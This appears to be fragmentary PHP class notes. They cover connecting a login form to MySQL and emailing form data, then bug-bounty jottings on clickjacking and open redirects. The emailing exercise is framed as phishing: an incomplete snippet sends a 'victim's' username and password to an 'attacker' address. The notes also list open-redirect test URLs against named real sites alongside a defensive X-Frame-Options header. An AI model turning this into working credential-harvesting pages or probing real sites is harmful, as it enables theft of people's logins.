Beruflich Dokumente
Kultur Dokumente
PHP
HYPERTEXT PREPROCESSORS
it acts as a middleware connecting your fronted and backend
write a php script that will connect your fron end design with the backend server
to configure smtp in your localserver - this is done so that you can send emails
using php.
create a login form with username and password. when the user enters the
credentials and clicks on the login button, you should get the credentials to your
email id.
-----------------------------------------------------------------------------------
-------------
<?php
$servername = "localhost";
$username = "root";
$password = "";
$database = "wdwasdatabase ";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
mysqli_close($conn);
?>
-----------------------------------------------------------------------------------
----------------------------------------------------
<html>
<body>
<form action="db.php" method="POST">
Username :
<input type ="text" name="username">
<br>
Password :
<input type ="text" name="password">
<input type ="submit" name="submit">
</form>
</body>
</html>
----------
<?php
$servername = "localhost";
$username = "root";
$password = "";
$database = "wdwasdatabase";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
echo("<br>");
$un = $_POST['username'];
$pw = $_POST['password'];
mysqli_close($conn);
?>
-----------------------------------------------------------------------------------
----------------------------------------------------
How to get the values and insert it into the table.
<?php
$servername = "localhost";
$username = "root";
$password = "";
$database = "wdwasdatabase";
// Create connection
$conn = mysqli_connect($servername, $username, $password, $database);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
echo("<br>");
$un = $_POST['username'];
$pw = $_POST['password'];
mysqli_close($conn);
?>
-----------------------------------------------------------------------------------
----------------------------------------------------
Sending emails
<?php
$name = 'sam';
$subject = 'Credentials Caught';
$pass = 'sam1234';
$mailFrom = 'samjohn@gmail.com';
$mailTo = "attackeradamshere@gmail.com";
$headers = "From: ".$mailFrom;
$txt = "You have credentials from victim. \n Username is ".$name.".\n\n and
Password is ".$pass;
-----------------------------------------------------------------------------------
----------------------------------------------------
BUG BOUNTY
CLICKJACKING
https://www.gov.uk/
9292.com
https://www.lookout.net/test/clickjack.html
Preventive Measures:
X-Frame-Options is a security header to prevent a well-known vulnerability called
Clickjacking.
The header instruct browser not to open a web page in a frame or iframe based on
the configuration.
Go to .htaccess file in shared webhosting and enter the following in the file
Go to httpd.conf file in Apache server and enter the following in the file
Header always append X-Frame-Options SAMEORIGIN
OPEN REDIRECTION
WWW.IGP.COM
WWW.COINDESK.COM
https://www.igp.com//bing.com/
https://www.coindesk.com//bing.com/